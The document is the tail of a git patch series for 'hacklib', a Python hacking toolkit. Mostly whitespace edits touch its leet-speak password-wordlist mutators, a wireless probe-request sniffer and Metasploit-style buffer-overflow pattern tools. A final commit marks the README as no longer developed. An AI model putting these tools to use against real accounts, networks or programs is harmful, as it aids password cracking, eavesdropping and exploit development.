"3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8")) - def UniqueLeet(self): for x in self.text.split(): - print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"),(x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"))) - - + print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"), (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"))) def Reverse(self): @@ -982,14 +1037,11 @@ def Reverse(self): print x[::-1] - def ReverseCap(self): for x in self.text.split(): print x[::-1].capitalize() - - def ReverseNum(self): for x in self.text.split(): @@ -999,8 +1051,6 @@ def ReverseNum(self): print ("%s" + "%s") % (x[::-1], i) print ("%s" + "%s") % (i, x[::-1]) - - def ReverseYears(self): for x in self.text.split(): @@ -1010,17 +1060,17 @@ def ReverseYears(self): print ("%s" + "%s") % (x[::-1], i) print ("%s" + "%s") % (i, x[::-1]) - def ReverseUnique(self): for x in self.text.split(): print x[::-1] + x[::-1] + ''' This Classes Dectects Probe Requests from Wireless Devices. -Example: +Example: Probe = Proberequests("wlan0") @@ -1028,6 +1078,7 @@ def ReverseUnique(self): ''' + class Proberequests: global probeReqs @@ -1053,9 +1104,10 @@ def startSniff(self): sniff(iface=self.interface, prn=self.sniffProbe) + """ -This class creates a unique pattern of 20280 characters. +This class creates a unique pattern of 20280 characters. This is a replica of the metasploit tool called pattern_create.rb @@ -1069,9 +1121,10 @@ def startSniff(self): """ + class PatternCreate: - global MAX_PATTERN_LENGTH + global MAX_PATTERN_LENGTH MAX_PATTERN_LENGTH = 20280 @@ -1122,11 +1175,10 @@ def generate(self): """ + class PatternOffset: def __init__(self, search_pattern): - - self.search_pattern = search_pattern @@ -1158,11 +1210,14 @@ def find(self): print "[+] Offset: " + str(offset) + if __name__ == '__main__': userInterface() + class MissingPackageException(Exception): '''Raise when 3rd party modules are not able to be imported.''' + class MissingPipexception(Exception): '''Raise when pip is not able to be found''' From 091e1b8e4ab7fe2c1c735b72b1acc3a4c0a77402 Mon Sep 17 00:00:00 2001 From: Leon Date: Mon, 26 Aug 2019 00:09:39 -0700 Subject: [PATCH 40/40] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 8059b8d..fcbb5e9 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ ![MIT License](https://img.shields.io/github/license/mashape/apistatus.svg) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) ##### Toolkit for hacking enthusiasts using Python. -hacklib is a Python module for hacking enthusiasts interested in network security. It is currently in active development. +hacklib is a Python module for hacking enthusiasts interested in network security. It is no longer in active development. #### Installation